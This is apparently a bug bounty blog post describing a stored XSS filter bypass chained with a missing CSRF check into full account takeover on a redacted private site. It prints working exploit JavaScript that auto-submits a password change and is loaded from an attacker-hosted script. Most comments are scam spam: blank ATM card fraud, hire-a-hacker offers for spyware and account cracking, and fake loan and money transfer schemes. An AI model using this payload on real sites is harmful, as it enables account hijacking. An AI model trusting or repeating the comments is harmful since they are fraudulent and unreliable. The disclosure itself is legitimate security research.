XSS + CSRF = Bhoom!

Hello :D Everyone,

It had been a long time since I got a good bug and a bounty too :3 so after an OWASP meet where I met many leet bounty hunters I felt so much motivated, to do a bug hunt.I started poking around and all , so this is a story of a simple Full Account Takeover on a h1 private site

Reported To****************
TypesCross-Site Request Forgery (CSRF),Cross-Site Scripting (XSS)
1. Stored XSS(Required Interaction)
 I found a XSS on its main domain in Website field of user's Profile.I tried javascript:alert(1) to check if javascript could be executed but saw that it was detected as invalid so I tried to to modify the payload to use it like javascript://http://google.com/?aaaa%0aalert(1) and it worked!.For those who don't know.

javascript:                        - Javascript's pseduo protocol/schema
//                                       - Begins a single line comment in js
https://google.com/?aaaa - comment itself
%0a                                  - Intiate a new line which ends the single line comment
alert(1)                             - a valid javascript's predefined function

so It got updated on my profile. But it required Victim to click on Attacker's website by sending him the Attacker's profile page which was publicly accessible so thats how i got a simple XSS with easy bypass. Now I decided to go further before reporting and I played around a little more and I Found that in "Change Password" functionality , they don't ask for the user's old password.Well that was pretty awesome to exploit :D with the XSS we found.


2.CSRF Bypass
 Even though i had a XSS I decided to check if an anti-CSRF token was there(which was not a need since we can grab the token with XSS using xhr). I thought if we could check if CSRF token is being validated on the server side so all I did was , removed the authenticity_token parameter from the form :D and boom! it got updated without it.

#.Full Account TakeOver
so Combining XSS and no confirmation check on user's old password. I Created a POC Which takeover the victim's account by just a click on Attacker's profile's Website. All We need is the victim should be logged into his account.

Earlier while Changing the password I saw that the form was submitted to an endpoint which had a unique user id which was not publicly known
https://www.******.com/users/{UNIQUE ID}
so we just needed to grab userid and since the csrf token is not validated we don't need to grab that.

So I made XHR Request to  /account (various other end points also contained user_id in their source) to find the user_id(victim's) and grabbed that and submitted the Password Change form with that user_id







I hosted this javascript on a https domain.
var user_id;
var http=new XMLHttpRequest;
http.open("GET","https://www.*******.com/account",true);
http.send();
http.onload=function()
{
    if(http.status===200)
    {
        var html=http.responseText;
        var parser=new DOMParser;
        var dom=parser.parseFromString(html,'text/html');
      
           user_id=(dom.getElementsByClassName('edit_user')[0].id).split('_')[2];

      
    }
};
alert(user_id);
var f=document.createElement('form');
var i1=document.createElement('input');
var i2=document.createElement('input');
var i3=document.createElement('input');
var i4=document.createElement('input');
var i5=document.createElement('input');
f.action="https://www.********.com/users/"+user_id;
f.class="edit_user";
f.id="edit_user_"+user_id;
f.method="POST";
i1.name="utf8";
i1.type="hidden";
i1.value="✓";
i2.name="_method";
i2.type="hidden";
i2.value="put";
i3.id="page";
i3.name="page";
i3.type="hidden";
i3.value="password";
i4.id="user_password"
i4.name="user[password]"
i4.value="my1337pass";
i4.type="password";
i5.class="button";
i5.name="commit";
i5.type="submit";
f.appendChild(i1);
f.appendChild(i2);
f.appendChild(i3);
f.appendChild(i4);
f.appendChild(i5);
f.submit();

and entered
 javascript://http://google.com.?a%0avar x=document.createElement('script');x.src='https://myhost/script.js';document.body.appendChild(x);
in the website url and updated my(attacker's) profile.



Now all victim had to do was , to click on attacker's website and BOOM! his password got changed to 'my1337pass'.


I got a fair enough bounty :D.

Thanks to every awesome infosec people who share their knowledge.

20 comments:

  1. bug bounty gawd, h1 private site

    ReplyDelete
    Replies
    1. INSTEAD OF GETTING A LOAN, CHECK OUT THE BLANK ATM CARD IN LESS THAN 24hours {blankatmhaker@gmail.com}

      Am Mark Oscar,I want to testify about Jack Robert blank ATM cards which can withdraw money from any ATM machines around the world. I was very poor before and have no hope then I saw so many testimony about how Jack Robert send them the ATM blank card and use it to collect money in any ATM machine and become rich. I also email him and he sent me the blank card. I have use it to get 70,000 dollars. withdraw the maximum of $5,000 daily. Jack Robert is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email Him on how to get it now via: blankatmhaker@gmail.com or call/Text on +1(406) 350-4986

      Delete
    2. This comment has been removed by the author.

      Delete
    3. SERVICES WE RENDERED

      specializes on services like; Western Union and Money Gram Transfer, Bank Transfer And Bank Logins, PayPal Transfer And PayPal Logins.

      WESTERN UNION/MONEYGRAM

      We have big Western Union Hack for everywhere and any time for you. We transfer money to all countries/territories in the world that have Western Union and Money Gram Agents. We can transfer big amounts and you can receive this money in your country. We don’t deduct any % of your transfer because we are hackers of cash, we give your cash in full and with big transfers we do give discounts .We make it very safe and the service is very fast. We do fair and reliable work.

      INFO WE JUST NEED FROM YOU TO MAKE YOUR TRANSFER :-

      First and Last Name
      City, State
      Country

      ABOUT RISK
      To reduce risk we cannot do transfer to same name all the time, The transaction is done by our exchanger who send the money to the receiver. This is done to increase the margin of safety both for us and the receiver no complains.

      Western Union Price List

      3500$-400$
      4500$-550$
      5500$-600$
      6500$-700$
      7500$-800$

      CONTACT CALL/WHATSAPP: +1(929)390-8581
      Contact us Email : globalhackingcompany@gmail.com
      ...

      Delete
  2. Amazing poC dude! thanks for sharing!

    https://twitter.com/knowledge_2014

    best regards
    ak1t4

    ReplyDelete
  3. I am having confused javascript://http://google.com/?aaaa%0aalert(1)
    this payload still runs and worked for many doamin whats this

    ReplyDelete

  4. شركة تنظيف فلل بالمدينة المنورة المنورة 0542742095 -0509178637
    | المدينة المنورة
    شركة تنظيف فلل بالمدينة المنورة

    يمكن الآن القيام بعملية التنظيف للفلل بغاية في السهولة الفلل معروفة بمساحتها الكبيرة وطوابقها المتعددة ولا يمكن لأصحابها أن يقوموا بعملية التنظيف كتنظيف وغسيل السجاد الموجود بها وأيضا الموكيت الذي يغطي معظم أرضيات المكان وأيضا تنظيف موقف السيارات الموجود بها والحديقة ولكن من خلال شركة تنظيف فلل بالمدينة المنورة يتم توفير العديد من الخدمات ويمكن طلبها مرة واحدة أو كل خدمة على حدى ومن ضمن تلك الخدمات لو كنت تريد تنظيف الممشى الخارجي للفلل فيمكن الاتصال وطلب خدمة جلى الأرضيات وأيضا يوجد لدينا خدمة تنظيف واجهات الفلل بأحدث الطرق حيث يتم استخدام مواد تقوم بالحفاظ على ألوان البياض وحمايته من العوامل الجوية كالأمطار والأتربة من الرياح الموسمية وأيضا خدمة تنظيف كنب وموكيت وستائر
    http://www.elmadinaelmonawara.com/%D8%B4%D8%B1%D9%83%D8%A9-%D8%AA%D9%86%D8%B8%D9%8A%D9%81-%D9%81%D9%84%D9%84-%D8%A8%D8%A7%D9%84%D9%85%D8%AF%D9%8A%D9%86%D8%A9-%D8%A7%D9%84%D9%85%D9%86%D9%88%D8%B1%D8%A9/

    للتواصل معانا
    0542742095 -0509178637

    او زيارة موقعنا
    http://www.elmadinaelmonawara.com
    كما نقدم اليكم المزيد من الخدمات
    شركة تنظيف منازل بالمدينة المنورة

    شركة تنظيف شقق بالمدينة المنورة

    شركة تنظيف عمائر بالمدينة المنورة
    شركة تنظيف بالمدينة المنورة

    ReplyDelete
    Replies
    1. INSTEAD OF GETTING A LOAN, CHECK OUT THE BLANK ATM CARD IN LESS THAN 24hours {blankatmhaker@gmail.com}

      Am Mark Oscar,I want to testify about Jack Robert blank ATM cards which can withdraw money from any ATM machines around the world. I was very poor before and have no hope then I saw so many testimony about how Jack Robert send them the ATM blank card and use it to collect money in any ATM machine and become rich. I also email him and he sent me the blank card. I have use it to get 70,000 dollars. withdraw the maximum of $5,000 daily. Jack Robert is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email Him on how to get it now via: blankatmhaker@gmail.com or call/Text on +1(406) 350-4986

      Delete
  5. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email (hydracards63@gmail.com) for how to get it and it cost,and how to also hack credit cards and send the money to your self,we are located around the world, these cards works on any ATM machine and it works according to it's activation.

    ………. EXPLANATION OF HOW THESE CARD WORKS……….

    You just slot in these card into any ATM Machine and it will automatically bring up a MENU of 1st VAULT #1,000, 2nd VAULT #5,000, RE-PROGRAMMED, EXIT, CANCEL. Just click on either of the VAULTS, and it will take you to another SUB-MENU of ALL, OTHERS, EXIT, CANCEL. Just click on others and type in the amount you wish to withdraw from the ATM and you have it cashed instantly… Done.

    ***NOTE: DON’T EVER MAKE THE MISTAKE OF CLICKING THE “ALL” OPTION. BECAUSE IT WILL TAKE OUT ALL THE AMOUNT OF THE SELECTED VAULT. To get the card email (hydracards63@gmail.com)

    ReplyDelete
  6. I've been reluctant in purchasing this blank ATM card i heard about online because everything seems too good to be true, but i was convinced & shocked when my friend at my place of work got the card from martins hackers & we both confirmed it really works, without delay i gave it a go. Ever since then I've been withdrawing $5000 daily from the card & the money has been in my own account. So glad i gave it a try at last & this card has really changed my life financially without getting caught, its real & truly works though its illegal but made me rich!! If you need this card from martins hackers then here is their email: martinshackers22@gmail.com....

    ReplyDelete
  7. How I Got My Blank ATM Card And Became Weathy...

    I'am Janaz Russ, me and my husband are here to testify about how we use
    Shawn Pablo ATM black card to make money and also have our own business
    today. Go get your blank ATM card today and be among the lucky ones. This
    PROGRAMMED blank ATM card is capable of hacking into any ATM machine,
    anywhere in the world. It has really changed our life for good and now we
    can say we are rich and we can never be poor again. You can withdraw the
    maximum of $ 10,000 daily We can proudly say our business is doing fine and
    we have up to 20,000 000 (20 millions dollars in our account) Is not
    illegal, there is no risk of being caught because it has been programmed in
    such a way that it is not traceable, it also has a technique that makes it
    impossible for the CCTV to detect you.. For details and cost on how to get
    yours today, email the hackers on: rickatmcardoffer@gmail.com

    ReplyDelete
  8. I am Mathew Cox from USA, I want to share my testimony on how i got the blank ATM card. I was so wrecked that my company fired me simply because i did not obliged to their terms, so they hacked into my system and phone and makes it so difficult to get any other job, i did all i could but things kept getting worse by the day that i couldn’t afford my 3 kids fees and pay my bills. I owe so many people trying to borrow money to survive because my old company couldn’t allow me get another job and they did all they could to destroy my life just for declining to be among their evil deeds. haven’t given up i kept searching for job online when i came across the testimony of a lady called Judith regarding how she got the blank ATM card. Due to my present state, i had to get in touch with Hacker called OSCAR WHITE of oscarwhitehackersworld@gmail.com and he told me the procedures and along with the terms which i agreed to abide and i was told that the Blank card will be deliver to me without any further delay and i hold on to his words and to my greatest surprise, i received an ATM card worth $4.5 million USD , All Thanks to OSCAR WHITE , if you are facing any financial problem contact him asap email address is oscarwhitehackersworld@gmail.com or Whats-app him +16319929129

    ReplyDelete
  9. CLASSIC CYBER HACKS
    How well are you prepared for a Cyber incident or Breach?, Is your Data safe?

    Strengthen your Cybersecurity stance by contacting CLASSIC CYBER HACKS for a Perfect, Unique, Classic and Professional Job in Securing your Network against all sort of Breache, for we are Specially equipped with the Best hands to getting your Cyber Hack needs met

    We specialize in All type of cyber Jobs such as:

    #TRACKING of GPS location, cars, Computers, Phones (Apple, windows and Android), e.t.c.
    We also track E-mail account, Social media such as Facebook, Twitter, Skype, Whatsapp, e.t.c.

    #RECOVERY of Passwords for E-mail address, Phones, Computers, Social media Accounts, Documents e.t.c,.
    NOTE: we also help Scammed persons recover their money.

    #INSTALLATION of Spy ware so as to spy into someone else's computer, phone or E-mail address and also Installation of Spy ware software on your individual O.S to know if your Gadget is being hacked into..
    We also Create and Install VIRUS into any desired computer gadget.

    #CRACKING into Websites, CCTV Survelance camera, Data base etc, of both Private and Govt organization, such as Schools, Hospitals, Court houses, The FBI, NSA e.t.c

    NOTE: We specialize in clearing of CRIMINAL RECORDS of diverse types.

    * We assure you that your Job will be attended to with care and efficiency as it will be handled with the Best professional hands in Cyber Hack business.

    #We also have a forum where you can get yourself equipped with Advanced hacking Knowledge
    And Also, if you're Good with Hacking and you think you can Join our Team of SOPHISTICATED HACKERS, you're welcome as well...
    At CLASSIC CYBER HACKS, we give you the Best service in the Hacking world.

    Write us on:

    *Classiccyberhacks@gmail.com
    *Classiccybernotch@gmail.com

    Signed,
    Collins .A.

    ReplyDelete
  10. Hi guys I am the master of BLANK ATM AND CREDIT CARD,BITCOINS AT AFFORDABLE PRICE for everyone.

    We sell this cards to all our customers and interested buyers worldwide, the card has a daily withdrawal limit of $5000 and up to $50,000 spending limit in stores and unlimited on POS.
    FOR ORDERING

    Blank Atm Card
    Credit Card
    Bitcoins
    and the rest contact us now

    Call/WhatsApp: +1(929)390-8581

    E-mail: globalhackingcompany@gmail.com
    Contact us now for immediately help///

    ReplyDelete
  11. You can GET THE NEWLY IMPROVED BLANK ATM CARD that can hack any ATM, ANYWHERE IN THE WORLD.{martinshackers22@gmail.com} I have been hearing about these BLANK ATM CARDS. I never knew it existed but until i tried my best to look for how i will get money to start up a business and pay my bills, i visited some sites so many times. I saw how people get helped with Blank ATM card from Hacking man called MARTINS. I was really surprise but i don’t really know what to do so i decided to email MARTINS. I complained to him how i needed money and he reply Yes, so I inquired about The Blank ATM Card. I have the faith is real and it will work because i saw many comments talking about his card. He told me Yes and that it is a card programmed for random money withdraws without being noticed and can also be used for free online purchases of any kind. i was amaze. after doing what he ask, 3 days later i received my card from DHL, i rush to try it on the closest ATM machine close to me, It worked like magic i was so happy. I was able to withdraw up to $9000 immediately. This was unbelievable and the happiest day of my life, So far i have being able to withdraw up to $88000 without any stress of being trace and caught. I don’t know why i am posting this here but i care about everyone who need financial help should contact him via {martinshackers22@gmail.com}

    ReplyDelete
  12. Hello Everybody,
    My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of $250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of $250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:(urgentloan22@gmail.com) Thank you.

    ReplyDelete
  13. Hello Everybody,
    My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of $250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of $250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius,via email:(urgentloan22@gmail.com) Thank you.

    ReplyDelete
  14. SERVICES WE RENDERED

    specializes on services like; Western Union and Money Gram Transfer, Bank Transfer And Bank Logins, PayPal Transfer And PayPal Logins.

    WESTERN UNION/MONEYGRAM

    We have big Western Union Hack for everywhere and any time for you. We transfer money to all countries/territories in the world that have Western Union and Money Gram Agents. We can transfer big amounts and you can receive this money in your country. We don’t deduct any % of your transfer because we are hackers of cash, we give your cash in full and with big transfers we do give discounts .We make it very safe and the service is very fast. We do fair and reliable work.

    INFO WE JUST NEED FROM YOU TO MAKE YOUR TRANSFER :-

    First and Last Name
    City, State
    Country

    ABOUT RISK
    To reduce risk we cannot do transfer to same name all the time, The transaction is done by our exchanger who send the money to the receiver. This is done to increase the margin of safety both for us and the receiver no complains.

    Western Union Price List

    3500$-400$
    4500$-550$
    5500$-600$
    6500$-700$
    7500$-800$

    CONTACT CALL/WHATSAPP: +1(929)390-8581
    Contact us Email : globalhackingcompany@gmail.com
    ...

    ReplyDelete

Powered by Blogger.